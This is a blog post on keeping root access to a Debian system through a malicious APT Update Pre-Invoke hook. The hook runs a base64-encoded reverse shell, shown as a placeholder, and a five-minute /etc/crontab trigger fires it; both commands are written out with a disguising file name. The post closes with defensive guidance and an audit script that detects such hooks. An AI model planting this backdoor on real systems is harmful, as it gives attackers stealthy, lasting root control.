Creating a backdoor through APT sources

December 18, 2024

Backdoor through APT sources

Advanced Package Tool (APT) is the package manager of Debian-based Linux distributions, handling the installation and removal of software packages. Once an attacker already has root on a system, though, APT itself can become a vector for persistence. This blog post explores a proof of concept (PoC) demonstrating how an attacker can leverage APT's configuration (the hook directives under /etc/apt/apt.conf.d, rather than the sources list itself) to establish a backdoor on a system. Note that writing to /etc/apt requires root, so this is a way of keeping access, not of gaining it.

Overview and modifying APT sources

The concept revolves around injecting a malicious command into APT's configuration files as a hook that runs whenever the package lists are refreshed, and then scheduling that refresh so the hook fires periodically. By doing so, an attacker can ensure persistent access to the compromised system, obtaining a root shell or running other malicious operations each time the hook runs.

Injecting the Pre-Invoke Command

echo 'APT::Update::Pre-Invoke {"echo {base64_encoded_reverse_shell} | base64 -d | bash";};' > /etc/apt/apt.conf.d/01-legit

Explanation:

  • echo 'APT::Update::Pre-Invoke {...};': This echoes the configuration directive that makes apt execute a command before apt update fetches the package indexes. APT::Update::Pre-Invoke is a list, so the command inside the braces is a quoted string terminated by a semicolon, and the list itself is closed with "};". The inner command must not contain unescaped double quotes, which is one reason the payload is base64-encoded.
  • "echo {base64_encoded_reverse_shell} | base64 -d | bash";: This is the command that will be executed. It decodes the base64-encoded reverse shell and pipes it into bash. Because apt update runs as root, so does the hook.
  • > /etc/apt/apt.conf.d/01-legit: This redirects the output to the specified file. I chose 01-legit because it sorts first in the directory and the name looks legitimate at a glance. When apt update is executed, the pre-invoke command decodes the base64-encoded reverse shell and executes it, thereby establishing a connection back to the attacker's system. Keep in mind that apt waits for the hook to finish, so a reverse shell that stays in the foreground keeps that apt update process alive for as long as the session lasts; background the shell inside the payload if the apt run should complete normally.

Ensuring Persistence with Cronjobs

The hook file itself survives a reboot, but it only fires when someone runs apt update. To make the backdoor call home on its own, we need a trigger that runs apt update regularly, and the simplest one is an entry in the system's crontab.

echo "*/5 * * * * root apt update" >> /etc/crontab

Explanation:

  • */5 * * * * root apt update: This schedules the apt update command to run every 5 minutes as root. Change the interval to your liking. Unlike a per-user crontab, /etc/crontab has a sixth field naming the account the job runs as; leave it out and cron reads "apt" as the username and never runs the job.
  • >> /etc/crontab: This appends the entry to the system crontab file, which cron re-reads automatically.

This cronjob ensures that the backdoor is executed periodically, maintaining persistent access to the compromised system.

By injecting a pre-invoke command into APT's configuration and scheduling apt update to run periodically, an attacker can establish a backdoor on a system. This method leverages APT's configuration files to execute malicious commands as root, ensuring persistence and remote access. On the defensive side, the place to look is not the sources list but /etc/apt/apt.conf and the files under /etc/apt/apt.conf.d: grep them for Pre-Invoke, Post-Invoke and Post-Invoke-Success directives (apt-config dump shows the effective configuration, hooks included), treat any hook that decodes base64 before running it as suspicious, and review /etc/crontab and the cron.d directory for entries that refresh APT by hand.
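The check just described, as an added audit script that is not part of the original post. It scans an APT configuration directory for command hooks, decodes any base64 payload it finds so an analyst can read it without executing it, and lists crontab entries that run an APT refresh. It defaults to the live locations; APT_CONF_DIR and CRON_FILE can be pointed at copies. The make_samples function builds a constructed fixture (a planted hook with a harmless encoded command, a benign config file and a cron trigger) purely to exercise the checks; nothing it creates is executed.

```shell
#!/bin/sh
# Added example (not from the original post): audit APT configuration and the
# system crontab for the persistence described above.

APT_CONF_DIR="${APT_CONF_DIR:-/etc/apt/apt.conf.d}"
CRON_FILE="${CRON_FILE:-/etc/crontab}"

# Files that define command hooks. APT honours Pre-Invoke, Post-Invoke and
# Post-Invoke-Success lists for both "update" and dpkg runs, so match the
# whole family rather than only APT::Update::Pre-Invoke.
find_apt_hooks() {
    grep -lE 'Pre-Invoke|Post-Invoke' "$APT_CONF_DIR"/* 2>/dev/null
    return 0
}

# Of those, the ones that decode something with base64 before running it,
# the pattern this post uses to keep the payload out of a casual "cat".
find_encoded_hooks() {
    for f in $(find_apt_hooks); do
        grep -qE 'base64 +(-d|--decode)' "$f" && printf '%s\n' "$f"
    done
    return 0
}

# Decode the first base64 blob (16+ chars) in a file; the result is printed,
# never executed.
decode_blob() {
    grep -oE '[A-Za-z0-9+/]{16,}={0,2}' "$1" | head -n 1 | base64 -d 2>/dev/null
}

# Cron entries that refresh APT by hand are unusual on hosts that rely on
# the apt-daily timers or unattended-upgrades; list them with line numbers.
find_cron_triggers() {
    grep -nE 'apt(-get)? .*update' "$CRON_FILE" 2>/dev/null
    return 0
}

# Constructed fixture for testing the checks: one planted hook whose payload
# is the harmless "touch /tmp/pwned", one benign file, one cron trigger.
make_samples() {
    dir=$(mktemp -d)
    APT_CONF_DIR="$dir/apt.conf.d"
    CRON_FILE="$dir/crontab"
    mkdir -p "$APT_CONF_DIR"
    blob=$(printf '%s' 'touch /tmp/pwned' | base64 | tr -d '\n')
    printf 'APT::Update::Pre-Invoke {"echo %s | base64 -d | bash";};\n' "$blob" \
        > "$APT_CONF_DIR/01-legit"
    printf 'APT::Periodic::Update-Package-Lists "1";\n' > "$APT_CONF_DIR/20auto-upgrades"
    printf '*/5 * * * * root apt update\n' > "$CRON_FILE"
}

# Human-readable report over whatever APT_CONF_DIR and CRON_FILE point at.
audit() {
    echo "== hook files with encoded payloads =="
    for f in $(find_encoded_hooks); do
        printf '%s -> %s\n' "$f" "$(decode_blob "$f")"
    done
    echo "== cron entries that refresh APT =="
    find_cron_triggers
}
```

Run audit on a live host to get the report; run make_samples first to see the output against the constructed fixture. A hook that does not decode base64 is still worth reading by hand, since the technique works just as well with the command written in the clear.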